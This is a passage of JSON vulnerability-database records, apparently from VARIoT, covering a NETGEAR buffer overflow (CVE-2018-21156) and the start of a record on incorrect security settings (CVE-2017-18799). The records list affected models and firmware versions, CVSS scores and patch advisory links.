"model": "r7900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.4.6"
},
{
"model": "r7900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.54"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.2"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.4"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.4 1.1.42"
},
{
"model": "r8000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.4.6"
},
{
"model": "r8000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.5.14"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.100 1.0.82"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.110"
},
{
"model": "wn2500rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wn2500rp",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.40"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.44"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
}
]
},
"cve": "CVE-2018-21156",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2018-21156",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016397",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2021-59154",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2018-21156",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2018-21156",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2018-016397",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21156",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21156",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2018-016397",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-59154",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2206",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-21156",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR D6220 is a wireless modem. WN2500RP is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow. This affects D6220 prior to 1.0.0.38, D6400 prior to 1.0.0.74, D7000v2 prior to 1.0.0.74, D8500 prior to 1.0.3.39, DGN2200v4 prior to 1.0.0.102, DGN2200Bv4 prior to 1.0.0.102, EX3700 prior to 1.0.0.70, EX3800 prior to 1.0.0.70, EX6000 prior to 1.0.0.30, EX6100 prior to 1.0.2.22, EX6120 prior to 1.0.0.40, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.38, EX6200 prior to 1.0.3.86, EX7000 prior to 1.0.0.64, R6250 prior to 1.0.4.20, R6300v2 prior to 1.0.4.22, R6400 prior to 1.0.1.32, R6400v2 prior to 1.0.2.52, R6700 prior to 1.0.1.44, R6900 prior to 1.0.1.44, R6900P prior to 1.3.0.18, R7000 prior to 1.0.9.28, R7000P prior to 1.3.0.18, R7300DST prior to 1.0.0.62, R7900 prior to 1.0.2.10, R7900P prior to 1.3.0.10, R8000 prior to 1.0.4.12, R8000P prior to 1.3.0.10, R8300 prior to 1.0.2.116, R8500 prior to 1.0.2.116, WN2500RPv2 prior to 1.0.1.52, WNDR3400v3 prior to 1.0.1.18, and WNR3500Lv2 prior to 1.2.0.46",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "VULMON",
"id": "CVE-2018-21156"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21156",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-59154",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2206",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-21156",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"id": "VAR-202004-1643",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
}
],
"trust": 1.080020309142857
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
}
]
},
"last_update_date": "2024-11-23T22:16:30.041000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Buffer Overflow on Some Gateways, Routers, and Extenders, PSV-2017-2460",
"trust": 0.8,
"url": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-59154)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/284396"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117721"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21156"
},
{
"trust": 1.7,
"url": "https://kb.netgear.com/000059474/security-advisory-for-post-authentication-buffer-overflow-on-some-gateways-routers-and-extenders-psv-2017-2460"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21156"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
},
{
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"date": "2020-04-27T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"date": "2020-06-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"date": "2020-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2206"
},
{
"date": "2020-04-27T18:15:12.420000",
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-59154"
},
{
"date": "2020-05-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-21156"
},
{
"date": "2020-06-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016397"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2206"
},
{
"date": "2024-11-21T04:03:02.340000",
"db": "NVD",
"id": "CVE-2018-21156"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016397"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2206"
}
],
"trust": 0.6
}
}
var-202004-1312
Vulnerability from variot
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28. plural NETGEAR The device contains an input verification vulnerability.Information may be tampered with. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. NETGEAR R6250 is a wireless router. NETGEAR R6700 is a wireless router. No detailed vulnerability details are currently provided
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1312",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.1.20"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.28"
},
{
"model": "r6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.14"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.14"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.1.1.20"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r7000p/r6900p",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6200v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.3.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61047"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
},
{
"db": "NVD",
"id": "CVE-2017-18799"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:r6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014925"
}
]
},
"cve": "CVE-2017-18799",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-18799",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
